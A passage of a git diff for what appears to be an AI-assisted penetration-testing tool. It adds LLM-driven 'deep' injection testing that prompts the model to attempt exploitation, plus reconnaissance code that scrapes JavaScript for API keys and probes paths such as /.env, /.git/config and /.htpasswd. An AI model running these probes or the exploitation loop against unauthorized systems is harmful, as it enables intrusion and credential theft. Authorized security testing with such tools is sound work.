[ft.get("vuln_type", "")], + }) + + insights = ai_analysis.get("target_insights", "") + if insights: + await self.log("info", f" [AI TOOL] {tool_name} insights: {insights[:120]}") + except Exception as e: + await self.log("debug", f" [AI TOOL] Analysis error for {tool_name}: {e}") + # Feed tool output back into recon context self._ingest_tool_results(tool_name, result) except Exception as e: await self.log("warning", f" [TOOL] {tool_name} failed: {e}") + async def _ai_analyze_tool_output(self, tool_name: str, tool_output: str) -> Dict: + """AI analysis of security tool output for Stream 3. + + Analyzes raw tool stdout/stderr to identify real findings, filter noise, + and suggest follow-up manual tests. + """ + try: + from backend.core.vuln_engine.ai_prompts import get_tool_analysis_prompt + except ImportError: + return {} + + # Build existing findings summary to avoid duplicates + existing_summary = "" + if self.findings: + existing_summary = "\n".join( + f" - [{f.severity}] {f.vulnerability_type}: {f.affected_endpoint[:60]}" + for f in self.findings[:15] + ) + + prompt = get_tool_analysis_prompt( + tool_name=tool_name, + tool_output=tool_output[:4000], + target=self.target, + existing_findings_summary=existing_summary, + ) + + try: + resp_text = await self.llm.generate( + prompt, + system=self._get_enhanced_system_prompt("interpretation") + ) + start = resp_text.index('{') + end = resp_text.rindex('}') + 1 + return json.loads(resp_text[start:end]) + except Exception: + return {} + def _ingest_tool_results(self, tool_name: str, result): """Feed tool output back into recon context for richer analysis.""" if not result or not result.findings: @@ -5816,9 +6689,26 @@ API Endpoints: {self.recon.api_endpoints[:5] if self.recon.api_endpoints else 'N await self._add_finding(finding) injection_types = [v for v in injection_types if v != "xss_reflected"] - # ── Phase B: Injection-based tests against parameterized endpoints ── + # ── Phase B: Injection-based tests (AI-first with hardcoded fallback) ── if injection_types: - await self.log("info", f" Running {len(injection_types)} injection tests against {len(test_targets)} targets") + # Split injection types: AI-deep for top priority, hardcoded for rest + ai_deep_budget = 15 # AI deep test for top 15 types + if self.token_budget and hasattr(self.token_budget, 'remaining'): + try: + remaining = self.token_budget.remaining() + if remaining and remaining < 50000: + ai_deep_budget = 5 # Low budget: fewer AI tests + except Exception: + pass + + ai_deep_types = injection_types[:ai_deep_budget] if self.llm.is_available() else [] + fallback_types = injection_types[ai_deep_budget:] if self.llm.is_available() else injection_types + + if ai_deep_types: + await self.log("info", + f" [AI-DEEP] AI-first testing for {len(ai_deep_types)} priority types " + f"against {len(test_targets)} targets") + for target in test_targets: await self._wait_if_paused() if self.is_cancelled(): @@ -5826,6 +6716,9 @@ API Endpoints: {self.recon.api_endpoints[:5] if self.recon.api_endpoints else 'N return url = target.get('url', '') + t_method = target.get('method', 'GET') + t_params = target.get('params', []) + t_form_defaults = target.get('form_defaults', {}) # Strategy: skip dead endpoints if self.strategy and not self.strategy.should_test_endpoint(url): @@ -5834,25 +6727,52 @@ API Endpoints: {self.recon.api_endpoints[:5] if self.recon.api_endpoints else 'N await self.log("info", f" Testing: {url[:60]}...") - for vuln_type in injection_types: + # ── AI-First: Iterative deep test for priority types ── + for vuln_type in ai_deep_types: + await self._wait_if_paused() + if self.is_cancelled(): + return + + if self.strategy and not self.strategy.should_test_type(vuln_type, url): + continue + + # Try AI deep test first + finding = await self._ai_deep_test( + url, vuln_type, t_params, t_method, t_form_defaults + ) + if finding: + await self._add_finding(finding) + if self.strategy: + self.strategy.record_test_result(url, vuln_type, 200, True, 0) + continue # AI found it, no fallback needed + + # AI deep test found nothing — fall back to hardcoded payloads + finding = await self._test_vulnerability_type( + url, vuln_type, t_method, t_params, + form_defaults=t_form_defaults + ) + if finding: + await self._add_finding(finding) + if self.strategy: + self.strategy.record_test_result(url, vuln_type, 200, True, 0) + elif self.strategy: + self.strategy.record_test_result(url, vuln_type, 0, False, 0) + + # ── Hardcoded fallback: remaining injection types ── + for vuln_type in fallback_types: await self._wait_if_paused() if self.is_cancelled(): return - # Strategy: skip vuln types with diminishing returns on this endpoint if self.strategy and not self.strategy.should_test_type(vuln_type, url): continue finding = await self._test_vulnerability_type( - url, - vuln_type, - target.get('method', 'GET'), - target.get('params', []), - form_defaults=target.get('form_defaults', {}) + url, vuln_type, t_method, t_params, + form_defaults=t_form_defaults ) if finding: await self._add_finding(finding) - # Strategy: record success if self.strategy: self.strategy.record_test_result(url, vuln_type, 200, True, 0) elif self.strategy: @@ -5861,6 +6781,8 @@ API Endpoints: {self.recon.api_endpoints[:5] if self.recon.api_endpoints else 'N # Strategy: recompute priorities periodically if self.strategy and self.strategy.should_recompute_priorities(): injection_types = self.strategy.recompute_priorities(injection_types) + ai_deep_types = injection_types[:ai_deep_budget] if self.llm.is_available() else [] + fallback_types = injection_types[ai_deep_budget:] if self.llm.is_available() else injection_types # ── Phase B+: AI-suggested additional tests ── if self.llm.is_available() and self.memory.confirmed_findings: @@ -5887,19 +6809,38 @@ API Endpoints: {self.recon.api_endpoints[:5] if self.recon.api_endpoints else 'N if finding: await self._add_finding(finding) - # ── Phase C: AI-driven tests (require LLM for intelligent analysis) ── + # ── Phase C: AI-driven tests (iterative deep test for AI-only types) ── if ai_types and self.llm.is_available(): - # Prioritize: test top 10 AI-driven types - ai_priority = ai_types[:10] - await self.log("info", f" AI-driven testing for {len(ai_priority)} types: {', '.join(ai_priority[:5])}...") + ai_priority = ai_types[:15] + await self.log("info", + f" [AI-DEEP] AI-driven iterative testing for {len(ai_priority)} types: " + f"{', '.join(ai_priority[:5])}...") for vt in ai_priority: await self._wait_if_paused() if self.is_cancelled(): return - await self._ai_dynamic_test( - f"Test the target {self.target} for {vt} vulnerability. " - f"Analyze the application behavior, attempt exploitation, and report only confirmed findings." - ) + + # Use AI deep test with endpoint-specific context + for target in test_targets[:3]: + t_url = target.get('url', self.target) + t_params = target.get('params', []) + t_method = target.get('method', 'GET') + t_form_defaults = target.get('form_defaults', {}) + + finding = await self._ai_deep_test( + t_url, vt, t_params, t_method, t_form_defaults + ) + if finding: + await self._add_finding(finding) + break # Found on one endpoint, move to next type + + # Fallback to original _ai_dynamic_test for types not found via deep test + if not any(f.vulnerability_type == vt for f in self.findings): + await self._ai_dynamic_test( + f"Test the target {self.target} for {vt} vulnerability. " + f"Analyze the application behavior, attempt exploitation, " + f"and report only confirmed findings." + ) async def _test_reflected_xss( self, url: str, params: List[str], method: str = "GET", diff --git a/backend/core/deep_recon.py b/backend/core/deep_recon.py index 1756696..d40b5c0 100644 --- a/backend/core/deep_recon.py +++ b/backend/core/deep_recon.py @@ -2,15 +2,19 @@ Advanced reconnaissance module for NeuroSploitv2. Performs deep JS analysis, sitemap/robots parsing, API enumeration, +source map parsing, framework-specific discovery, path fuzzing, and technology fingerprinting using async HTTP requests. """ import re import json import asyncio +import logging from dataclasses import dataclass, field -from typing import Dict, List, Optional -from urllib.parse import urljoin, urlparse +from typing import Dict, List, Optional, Set, Tuple +from urllib.parse import urljoin, urlparse, parse_qs, urlencode + +logger = logging.getLogger(__name__) try: import aiohttp @@ -24,17 +28,24 @@ except ImportError: ET = None REQUEST_TIMEOUT = aiohttp.ClientTimeout(total=10) if HAS_AIOHTTP else None -MAX_JS_FILES = 10 -MAX_JS_SIZE = 500 * 1024 # 500 KB -MAX_SITEMAP_URLS = 200 +MAX_JS_FILES = 30 +MAX_JS_SIZE = 1024 * 1024 # 1 MB +MAX_SITEMAP_URLS = 500 +MAX_SITEMAP_DEPTH = 3 # Recursive sitemap index depth +MAX_ENDPOINTS = 2000 # Global cap to prevent memory bloat # --- Regex patterns for JS analysis --- -RE_API_ENDPOINT = re.compile(r'/api/v[0-9]+/[a-z_/]+') +RE_API_ENDPOINT = re.compile(r'["\'](/api/v?\d*/[a-zA-Z0-9_/\-{}]+)["\']') +RE_RELATIVE_PATH = re.compile(r'["\'](/[a-zA-Z0-9_\-]+(?:/[a-zA-Z0-9_\-{}]+){1,6})["\']') RE_FETCH_URL = re.compile(r'fetch\(\s*["\']([^"\']+)["\']') -RE_AXIOS_URL = re.compile(r'axios\.(?:get|post|put|patch|delete)\(\s*["\']([^"\']+)["\']') +RE_AXIOS_URL = re.compile(r'axios\.(?:get|post|put|patch|delete|request)\(\s*["\']([^"\']+)["\']') RE_AJAX_URL = re.compile(r'\$\.ajax\(\s*\{[^}]*url\s*:\s*["\']([^"\']+)["\']', re.DOTALL) RE_XHR_URL = re.compile(r'\.open\(\s*["\'][A-Z]+["\']\s*,\s*["\']([^"\']+)["\']') +RE_TEMPLATE_LITERAL = re.compile(r'`(/[a-zA-Z0-9_/\-]+\$\{[^}]+\}[a-zA-Z0-9_/\-]*)`') +RE_WINDOW_LOCATION = re.compile(r'(?:window\.location|location\.href)\s*=\s*["\']([^"\']+)["\']') +RE_FORM_ACTION = re.compile(r'action\s*[:=]\s*["\']([^"\']+)["\']') +RE_HREF_PATTERN = re.compile(r'href\s*[:=]\s*["\']([^"\']+)["\']') RE_API_KEY = re.compile( r'(?:sk-[a-zA-Z0-9]{20,}|pk_(?:live|test)_[a-zA-Z0-9]{20,}' @@ -51,6 +62,20 @@ RE_INTERNAL_URL = re.compile( RE_REACT_ROUTE = re.compile(r'path\s*[:=]\s*["\'](/[^"\']*)["\']') RE_ANGULAR_ROUTE = re.compile(r'path\s*:\s*["\']([^"\']+)["\']') RE_VUE_ROUTE = re.compile(r'path\s*:\s*["\'](/[^"\']*)["\']') +RE_NEXTJS_PAGE = re.compile(r'"(/[a-zA-Z0-9_/\[\]\-]+)"') + +# Source map patterns +RE_SOURCEMAP_URL = re.compile(r'//[#@]\s*sourceMappingURL\s*=\s*(\S+)') +RE_SOURCEMAP_ROUTES = re.compile(r'(?:pages|routes|views)/([a-zA-Z0-9_/\[\]\-]+)\.(?:tsx?|jsx?|vue|svelte)') + +# GraphQL patterns +RE_GQL_QUERY = re.compile(r'(?:query|mutation|subscription)\s+(\w+)') +RE_GQL_FIELD = re.compile(r'gql\s*`[^`]*`', re.DOTALL) + +# Parameter patterns in JS +RE_URL_PARAM = re.compile(r'[?&]([a-zA-Z0-9_]+)=') +RE_BODY_PARAM = re.compile(r'(?:body|data|params)\s*[:=]\s*\{([^}]+)\}', re.DOTALL) +RE_JSON_KEY = re.compile(r'["\']([a-zA-Z_][a-zA-Z0-9_]*)["\']') @dataclass @@ -60,6 +85,8 @@ class JSAnalysisResult: api_keys: List[str] = field(default_factory=list) internal_urls: List[str] = field(default_factory=list) secrets: List[str] = field(default_factory=list) + parameters: Dict[str, List[str]] = field(default_factory=dict) + source_map_routes: List[str] = field(default_factory=list) @dataclass @@ -70,12 +97,38 @@ class APISchema: source: str = "" +@dataclass +class EndpointInfo: + """Rich endpoint descriptor with method and parameter hints.""" + url: str + method: str = "GET" + params: List[str] = field(default_factory=list) + source: str = "" # How this endpoint was discovered + priority: int = 5 # 1-10, higher = more interesting + + +def _normalize_url(url: str) -> str: + """Canonicalize a URL for deduplication.""" + parsed = urlparse(url) + path = parsed.path.rstrip("/") or "/" + # Normalize double slashes + while "//" in path: + path = path.replace("//", "/") + # Sort query parameters + if parsed.query: + params = parse_qs(parsed.query, keep_blank_values=True) + sorted_query = urlencode(sorted(params.items()), doseq=True) + return f"{parsed.scheme}://{parsed.netloc}{path}?{sorted_query}" + return f"{parsed.scheme}://{parsed.netloc}{path}" + + class DeepRecon: """Advanced reconnaissance: JS analysis, sitemap, robots, API enum, fingerprinting.""" def __init__(self, session: Optional["aiohttp.ClientSession"] = None): self._external_session = session is not None self._session = session + self._seen_urls: Set[str] = set() async def _get_session(self) -> "aiohttp.ClientSession": if self._session is None or self._session.closed: @@ -101,100 +154,262 @@ class DeepRecon: except Exception: return None + async def _head_check(self, url: str) -> Optional[int]: + """Quick HEAD request to check if a URL exists. Returns status or None.""" + try: + session = await self._get_session() + async with session.head(url, ssl=False, allow_redirects=True, timeout=aiohttp.ClientTimeout(total=5)) as resp: + return resp.status + except Exception: + return None + + async def _check_url_alive(self, url: str, accept_codes: Set[int] = None) -> bool: + """Check if URL returns an acceptable status code.""" + if accept_codes is None: + accept_codes = {200, 201, 301, 302, 307, 308, 401, 403} + status = await self._head_check(url) + return status is not None and status in accept_codes + # ------------------------------------------------------------------ - # JS file analysis + # JS file analysis (enhanced) # ------------------------------------------------------------------ async def crawl_js_files(self, base_url: str, js_urls: List[str]) -> JSAnalysisResult: """Fetch and analyse JavaScript files for endpoints, keys, and secrets.""" result = JSAnalysisResult() - urls_to_scan = js_urls[:MAX_JS_FILES] + urls_to_scan = list(dict.fromkeys(js_urls))[:MAX_JS_FILES] tasks = [self._fetch(urljoin(base_url, u), max_size=MAX_JS_SIZE) for u in urls_to_scan] bodies = await asyncio.gather(*tasks, return_exceptions=True) + # Also try to fetch source maps in parallel + sourcemap_tasks = [] + sourcemap_base_urls = [] + for url, body in zip(urls_to_scan, bodies): + if not isinstance(body, str): + continue + sm = RE_SOURCEMAP_URL.search(body) + if sm: + sm_url = sm.group(1) + if not sm_url.startswith("data:"): + full_url = urljoin(urljoin(base_url, url), sm_url) + sourcemap_tasks.append(self._fetch(full_url, max_size=MAX_JS_SIZE * 2)) + sourcemap_base_urls.append(full_url) + + sourcemap_bodies = [] + if sourcemap_tasks: + sourcemap_bodies = await asyncio.gather(*sourcemap_tasks, return_exceptions=True) + seen_endpoints: set = set() + seen_params: Dict[str, Set[str]] = {} + for body in bodies: if not isinstance(body, str): continue + self._extract_from_js(body, seen_endpoints, seen_params, result) - # API endpoint patterns - for m in RE_API_ENDPOINT.finditer(body): - seen_endpoints.add(m.group(0)) - for regex in (RE_FETCH_URL, RE_AXIOS_URL, RE_AJAX_URL, RE_XHR_URL): - for m in regex.finditer(body): - seen_endpoints.add(m.group(1)) - - # Route definitions (React Router, Angular, Vue Router) - for regex in (RE_REACT_ROUTE, RE_ANGULAR_ROUTE, RE_VUE_ROUTE): - for m in regex.finditer(body): - seen_endpoints.add(m.group(1)) - - # API keys / tokens - for m in RE_API_KEY.finditer(body): - val = m.group(0) - if val not in result.api_keys: - result.api_keys.append(val) - result.secrets.append(val) - - # Internal / private URLs - for m in RE_INTERNAL_URL.finditer(body): - val = m.group(0) - if val not in result.internal_urls: - result.internal_urls.append(val) + # Parse source maps for original file paths → route discovery + for sm_body in sourcemap_bodies: + if not isinstance(sm_body, str): + continue + try: + sm_data = json.loads(sm_body) + sources = sm_data.get("sources", []) + for src in sources: + m = RE_SOURCEMAP_ROUTES.search(src) + if m: + route = "/" + m.group(1).replace("[", "{").replace("]", "}") + result.source_map_routes.append(route) + seen_endpoints.add(route) + except (json.JSONDecodeError, ValueError): + # Not valid JSON source map — might still contain paths + for m in RE_SOURCEMAP_ROUTES.finditer(sm_body): + route = "/" + m.group(1).replace("[", "{").replace("]", "}") + result.source_map_routes.append(route) + seen_endpoints.add(route) # Resolve endpoints relative to base_url for ep in sorted(seen_endpoints): - resolved = urljoin(base_url, ep) if not ep.startswith("http") else ep - if resolved not in result.endpoints: + if ep.startswith("http"): + resolved = ep + elif ep.startswith("/"): + resolved = urljoin(base_url, ep) + else: + continue + normalized = _normalize_url(resolved) + if normalized not in self._seen_urls: + self._seen_urls.add(normalized) result.endpoints.append(resolved) + # Convert param sets + for endpoint, params in seen_params.items(): + result.parameters[endpoint] = sorted(params) + return result + def _extract_from_js( + self, body: str, seen_endpoints: set, seen_params: Dict[str, Set[str]], + result: JSAnalysisResult, + ): + """Extract endpoints, params, keys, and internal URLs from a JS body.""" + # API endpoint patterns (expanded) + for regex in (RE_API_ENDPOINT, RE_RELATIVE_PATH, RE_FETCH_URL, RE_AXIOS_URL, + RE_AJAX_URL, RE_XHR_URL, RE_TEMPLATE_LITERAL, RE_WINDOW_LOCATION, + RE_FORM_ACTION, RE_HREF_PATTERN): + for m in regex.finditer(body): + ep = m.group(1) if regex.groups else m.group(0) + # Filter out obvious non-endpoints + if self._is_valid_endpoint(ep): + seen_endpoints.add(ep) + + # Route definitions (React Router, Angular, Vue Router, Next.js) + for regex in (RE_REACT_ROUTE, RE_ANGULAR_ROUTE, RE_VUE_ROUTE, RE_NEXTJS_PAGE): + for m in regex.finditer(body): + route = m.group(1) + if route.startswith("/") and len(route) < 200: + seen_endpoints.add(route) + + # Extract URL parameters + for m in RE_URL_PARAM.finditer(body): + param_name = m.group(1) + # Find the URL this param belongs to (rough heuristic) + start = max(0, m.start() - 200) + context = body[start:m.start()] + for ep_regex in (RE_FETCH_URL, RE_API_ENDPOINT): + ep_match = ep_regex.search(context) + if ep_match: + ep = ep_match.group(1) if ep_regex.groups else ep_match.group(0) + if ep not in seen_params: + seen_params[ep] = set() + seen_params[ep].add(param_name) + + # Extract JSON body parameters + for m in RE_BODY_PARAM.finditer(body): + block = m.group(1) + for key_m in RE_JSON_KEY.finditer(block): + key = key_m.group(1) + if len(key) <= 50 and not key.startswith("__"): + if "_body_params" not in seen_params: + seen_params["_body_params"] = set() + seen_params["_body_params"].add(key) + + # API keys / tokens + for m in RE_API_KEY.finditer(body): + val = m.group(0) + if val not in result.api_keys: + result.api_keys.append(val) + result.secrets.append(val) + + # Internal / private URLs + for m in RE_INTERNAL_URL.finditer(body): + val = m.group(0) + if val not in result.internal_urls: + result.internal_urls.append(val) + + @staticmethod + def _is_valid_endpoint(ep: str) -> bool: + """Filter out non-endpoint matches (CSS, images, data URIs, etc.).""" + if not ep or len(ep) > 500: + return False + if ep.startswith(("data:", "javascript:", "mailto:", "tel:", "#", "blob:")): + return False + # Skip common static assets + SKIP_EXT = ('.css', '.png', '.jpg', '.jpeg', '.gif', '.svg', '.ico', '.woff', + '.woff2', '.ttf', '.eot', '.mp4', '.mp3', '.webp', '.avif', + '.map', '.ts', '.tsx', '.jsx', '.scss', '.less', '.pdf') + lower = ep.lower() + if any(lower.endswith(ext) for ext in SKIP_EXT): + return False + # Must look like a path + if ep.startswith("/") or ep.startswith("http"): + return True + return False + # ------------------------------------------------------------------ - # Sitemap parsing + # Sitemap parsing (enhanced with recursive index following) # ------------------------------------------------------------------ async def parse_sitemap(self, target: str) -> List[str]: - """Fetch and parse sitemap XML files for URLs.""" + """Fetch and parse sitemap XML files for URLs. Follows sitemap indexes recursively.""" target = target.rstrip("/") candidates = [ f"{target}/sitemap.xml", f"{target}/sitemap_index.xml", f"{target}/sitemap1.xml", + f"{target}/sitemap-index.xml", + f"{target}/sitemaps.xml", + f"{target}/post-sitemap.xml", + f"{target}/page-sitemap.xml", + f"{target}/category-sitemap.xml", ] - urls: set = set() - for sitemap_url in candidates: + # Also check robots.txt for sitemap directives + robots_body = await self._fetch(f"{target}/robots.txt") + if robots_body: + for line in robots_body.splitlines(): + line = line.strip() + if line.lower().startswith("sitemap:"): + sm_url = line.split(":", 1)[1].strip() + if sm_url and sm_url not in candidates: + candidates.append(sm_url) + + urls: set = set() + visited_sitemaps: set = set() + + async def _parse_one(sitemap_url: str, depth: int = 0): + if depth > MAX_SITEMAP_DEPTH or sitemap_url in visited_sitemaps: + return + if len(urls) >= MAX_SITEMAP_URLS: + return + visited_sitemaps.add(sitemap_url) + body = await self._fetch(sitemap_url) if not body or ET is None: - continue + return try: root = ET.fromstring(body) except ET.ParseError: - continue - # Handle both sitemapindex and urlset; strip namespace + return + + sub_sitemaps = [] for elem in root.iter(): tag = elem.tag.split("}")[-1] if "}" in elem.tag else elem.tag if tag == "loc" and elem.text: - urls.add(elem.text.strip()) + loc = elem.text.strip() + # Check if this is a sub-sitemap + if loc.endswith(".xml") or "sitemap" in loc.lower(): + sub_sitemaps.append(loc) + else: + urls.add(loc) if len(urls) >= MAX_SITEMAP_URLS: - return sorted(urls)[:MAX_SITEMAP_URLS] + return + + # Recursively follow sub-sitemaps + for sub in sub_sitemaps[:10]: # Limit sub-sitemap recursion + await _parse_one(sub, depth + 1) + + # Parse all candidate sitemaps + for sitemap_url in candidates: + if len(urls) >= MAX_SITEMAP_URLS: + break + await _parse_one(sitemap_url) return sorted(urls)[:MAX_SITEMAP_URLS] # ------------------------------------------------------------------ - # Robots.txt parsing + # Robots.txt parsing (enhanced with Sitemap extraction) # ------------------------------------------------------------------ - async def parse_robots(self, target: str) -> List[str]: - """Parse robots.txt and return resolved paths (Disallow + Allow).""" + async def parse_robots(self, target: str) -> Tuple[List[str], List[str]]: + """Parse robots.txt. Returns (paths, sitemap_urls).""" target = target.rstrip("/") body = await self._fetch(f"{target}/robots.txt") if not body: - return [] + return [], [] paths: set = set() + sitemaps: list = [] + for line in body.splitlines(): line = line.strip() if line.startswith("#") or ":" not in line: @@ -202,14 +417,16 @@ class DeepRecon: directive, _, value = line.partition(":") directive = directive.strip().lower() value = value.strip() - if directive in ("disallow", "allow") and value: + if directive in ("disallow", "allow") and value and value != "/": resolved = urljoin(target + "/", value) paths.add(resolved) + elif directive == "sitemap" and value: + sitemaps.append(value) - return sorted(paths) + return sorted(paths), sitemaps # ------------------------------------------------------------------ - # API enumeration (Swagger / OpenAPI / GraphQL) + # API enumeration (Swagger / OpenAPI / GraphQL / WADL / AsyncAPI) # ------------------------------------------------------------------ _API_DOC_PATHS = [ @@ -217,61 +434,97 @@ class DeepRecon: "/openapi.json", "/api-docs", "/v2/api-docs", + "/v3/api-docs", "/swagger/v1/swagger.json", + "/swagger/v2/swagger.json", "/.well-known/openapi", "/api/swagger.json", + "/api/openapi.json", + "/api/v1/swagger.json", + "/api/v1/openapi.json", + "/api/docs", + "/docs/api", + "/doc.json", + "/public/swagger.json", + "/swagger-ui/swagger.json", + "/api-docs.json", + "/api/api-docs", + "/_api/docs", + ] + + _GRAPHQL_PATHS = [ + "/graphql", + "/graphiql", + "/api/graphql", + "/v1/graphql", + "/gql", + "/query", ] async def enumerate_api(self, target: str, technologies: List[str]) -> APISchema: - """Discover and parse API documentation (OpenAPI/Swagger, GraphQL).""" + """Discover and parse API documentation (OpenAPI/Swagger, GraphQL, WADL).""" target = target.rstrip("/") schema = APISchema() - # Try OpenAPI / Swagger endpoints - for path in self._API_DOC_PATHS: - body = await self._fetch(f"{target}{path}") - if not body: + # Try OpenAPI / Swagger endpoints (parallel batch) + api_tasks = [self._fetch(f"{target}{path}") for path in self._API_DOC_PATHS] + api_results = await asyncio.gather(*api_tasks, return_exceptions=True) + + for path, body in zip(self._API_DOC_PATHS, api_results): + if not isinstance(body, str): continue try: doc = json.loads(body) except (json.JSONDecodeError, ValueError): continue - # Looks like a valid Swagger/OpenAPI doc if "paths" in doc or "openapi" in doc or "swagger" in doc: schema.version = doc.get("openapi", doc.get("info", {}).get("version", "")) schema.source = path for route, methods in doc.get("paths", {}).items(): + if not isinstance(methods, dict): + continue for method, detail in methods.items(): if method.lower() in ("get", "post", "put", "patch", "delete", "options", "head"): - params = [ - p.get("name", "") - for p in detail.get("parameters", []) - if isinstance(p, dict) - ] + params = [] + if isinstance(detail, dict): + for p in detail.get("parameters", []): + if isinstance(p, dict): + params.append(p.get("name", "")) + # Also extract request body schema params + req_body = detail.get("requestBody", {}) + if isinstance(req_body, dict): + content = req_body.get("content", {}) + for ct, ct_detail in content.items(): + if isinstance(ct_detail, dict): + props = ct_detail.get("schema", {}).get("properties", {}) + if isinstance(props, dict): + params.extend(props.keys()) schema.endpoints.append({ "url": route, "method": method.upper(), - "params": params, + "params": [p for p in params if p], }) + logger.info(f"[DeepRecon] Found API schema at {path}: {len(schema.endpoints)} endpoints") return schema - # GraphQL introspection - if "graphql" in [t.lower() for t in technologies] or not schema.endpoints: - introspection = await self._graphql_introspect(target) + # GraphQL introspection (try multiple paths) + for gql_path in self._GRAPHQL_PATHS: + introspection = await self._graphql_introspect(f"{target}{gql_path}") if introspection: return introspection return schema - async def _graphql_introspect(self, target: str) -> Optional[APISchema]: - """Attempt GraphQL introspection query.""" - query = '{"query":"{ __schema { queryType { name } types { name fields { name args { name } } } } }"}' + async def _graphql_introspect(self, gql_url: str) -> Optional[APISchema]: + """Attempt GraphQL introspection query at a specific URL.""" + query = '{"query":"{ __schema { queryType { name } mutationType { name } types { name kind fields { name args { name type { name } } } } } }"}' try: session = await self._get_session() headers = {"Content-Type": "application/json"} async with session.post( - f"{target}/graphql", data=query, headers=headers, ssl=False + gql_url, data=query, headers=headers, ssl=False, + timeout=aiohttp.ClientTimeout(total=8), ) as resp: if resp.status != 200: return None @@ -282,10 +535,13 @@ class DeepRecon: if "data" not in data or "__schema" not in data.get("data", {}): return None - schema = APISchema(version="graphql", source="/graphql") + parsed_url = urlparse(gql_url) + source_path = parsed_url.path + + schema = APISchema(version="graphql", source=source_path) for type_info in data["data"]["__schema"].get("types", []): type_name = type_info.get("name", "") - if type_name.startswith("__"): + if type_name.startswith("__") or type_info.get("kind") in ("SCALAR", "ENUM", "INPUT_OBJECT"): continue for fld in type_info.get("fields", []) or []: params = [a["name"] for a in fld.get("args", []) if isinstance(a, dict)] @@ -296,13 +552,264 @@ class DeepRecon: }) return schema if schema.endpoints else None + # ------------------------------------------------------------------ + # Framework-specific endpoint discovery + # ------------------------------------------------------------------ + + _FRAMEWORK_PATHS: Dict[str, List[str]] = { + "wordpress": [ + "/wp-admin/", "/wp-login.php", "/wp-json/wp/v2/posts", + "/wp-json/wp/v2/users", "/wp-json/wp/v2/pages", + "/wp-json/wp/v2/categories", "/wp-json/wp/v2/comments", + "/wp-json/wp/v2/media", "/wp-json/wp/v2/tags", + "/wp-json/", "/wp-content/uploads/", + "/wp-cron.php", "/xmlrpc.php", "/?rest_route=/wp/v2/users", + "/wp-admin/admin-ajax.php", "/wp-admin/load-scripts.php", + "/wp-includes/wlwmanifest.xml", + ], + "laravel": [ + "/api/user", "/api/login", "/api/register", + "/sanctum/csrf-cookie", "/telescope", + "/horizon", "/nova-api/", "/_debugbar/open", + "/storage/logs/laravel.log", "/env", + ], + "django": [ + "/admin/", "/admin/login/", "/api/", + "/__debug__/", "/static/admin/", + "/accounts/login/", "/accounts/signup/", + "/api/v1/", "/api/v2/", + ], + "spring": [ + "/actuator", "/actuator/health", "/actuator/env", + "/actuator/beans", "/actuator/mappings", "/actuator/info", + "/actuator/configprops", "/actuator/metrics", + "/swagger-ui.html", "/swagger-ui/index.html", + "/api-docs", "/v3/api-docs", + ], + "express": [ + "/api/", "/api/v1/", "/api/health", + "/api/status", "/auth/login", "/auth/register", + "/graphql", + ], + "aspnet": [ + "/_blazor", "/swagger", "/swagger/index.html", + "/api/values", "/api/health", + "/Identity/Account/Login", "/Identity/Account/Register", + ], + "rails": [ + "/rails/info", "/rails/mailers", + "/api/v1/", "/admin/", + "/users/sign_in", "/users/sign_up", + "/assets/application.js", + ], + "nextjs": [ + "/_next/data/", "/api/", "/api/auth/session", + "/api/auth/signin", "/api/auth/providers", + "/_next/static/chunks/", + ], + "flask": [ + "/api/", "/api/v1/", "/admin/", + "/static/", "/auth/login", "/auth/register", + "/swagger.json", + ], + } + + # Common hidden paths to check regardless of framework + _COMMON_HIDDEN_PATHS = [ + "/.env", "/.git/config", "/.git/HEAD", + "/backup/", "/backups/", "/backup.sql", "/backup.zip", + "/config.json", "/config.yaml", "/config.yml", + "/debug/", "/debug/vars", "/debug/pprof", + "/internal/", "/internal/health", "/internal/status", + "/metrics", "/prometheus", "/health", "/healthz", "/ready", + "/status", "/ping", "/version", "/info", + "/.well-known/security.txt", "/security.txt", + "/crossdomain.xml", "/clientaccesspolicy.xml", + "/server-status", "/server-info", + "/phpinfo.php", "/info.php", + "/web.config", "/WEB-INF/web.xml", + "/console/", "/manage/", "/management/", + "/api/debug", "/api/config", + "/trace", "/jolokia/", + "/cgi-bin/", "/fcgi-bin/", + "/.htaccess", "/.htpasswd", + ] + + async def discover_framework_endpoints( + self, target: str, technologies: List[str] + ) -> List[EndpointInfo]: + """Probe framework-specific endpoints based on detected technologies.""" + target = target.rstrip("/") + tech_lower = [t.lower() for t in technologies] + endpoints: List[EndpointInfo] = [] + urls_to_check: List[Tuple[str, str, int]] = [] # (url, source, priority) + + # Match frameworks by technology signatures + fw_matches = set() + for fw_name, keywords in { + "wordpress": ["wordpress", "wp-", "woocommerce"], + "laravel": ["laravel", "php", "lumen"], + "django": ["django", "python", "wagtail"], + "spring": ["spring", "java", "tomcat", "wildfly", "jetty"], + "express": ["express", "node", "koa", "fastify"], + "aspnet": ["asp.net", ".net", "blazor", "iis"], + "rails": ["ruby", "rails", "rack"], + "nextjs": ["next.js", "nextjs", "react", "vercel"], + "flask": ["flask", "python", "gunicorn", "werkzeug"], + }.items(): + for kw in keywords: + for tech in tech_lower: + if kw in tech: + fw_matches.add(fw_name) + break + + # Add framework-specific paths + for fw in fw_matches: + for path in self._FRAMEWORK_PATHS.get(fw, []): + urls_to_check.append((f"{target}{path}", f"framework:{fw}", 7)) + + # Always check common hidden paths + for path in self._COMMON_HIDDEN_PATHS: + urls_to_check.append((f"{target}{path}", "common_hidden", 6)) + + # Batch check existence (parallel HEAD requests) + check_tasks = [self._check_url_alive(url) for url, _, _ in urls_to_check] + results = await asyncio.gather(*check_tasks, return_exceptions=True) + + for (url, source, priority), alive in zip(urls_to_check, results): + if alive is True: + endpoints.append(EndpointInfo( + url=url, method="GET", source=source, priority=priority, + )) + + logger.info(f"[DeepRecon] Framework discovery: {len(endpoints)}/{len(urls_to_check)} alive") + return endpoints + + # ------------------------------------------------------------------ + # Path pattern fuzzing + # ------------------------------------------------------------------ + + async def fuzz_api_patterns( + self, target: str, known_endpoints: List[str] + ) -> List[EndpointInfo]: + """Infer and test related endpoints from discovered patterns.""" + target = target.rstrip("/") + target_parsed = urlparse(target) + target_origin = f"{target_parsed.scheme}://{target_parsed.netloc}" + + inferred: Set[str] = set() + + # Extract API path patterns + api_bases: Set[str] = set() + api_resources: Set[str] = set() + + for ep in known_endpoints: + parsed = urlparse(ep) + path = parsed.path + # Identify API base paths like /api/v1, /api/v2 + m = re.match(r'(/api(?:/v\d+)?)', path) + if m: + api_bases.add(m.group(1)) + # Extract resource name + rest = path[len(m.group(1)):] + parts = [p for p in rest.split("/") if p and not p.isdigit() and not re.match(r'^[0-9a-f-]{8,}$', p)] + if 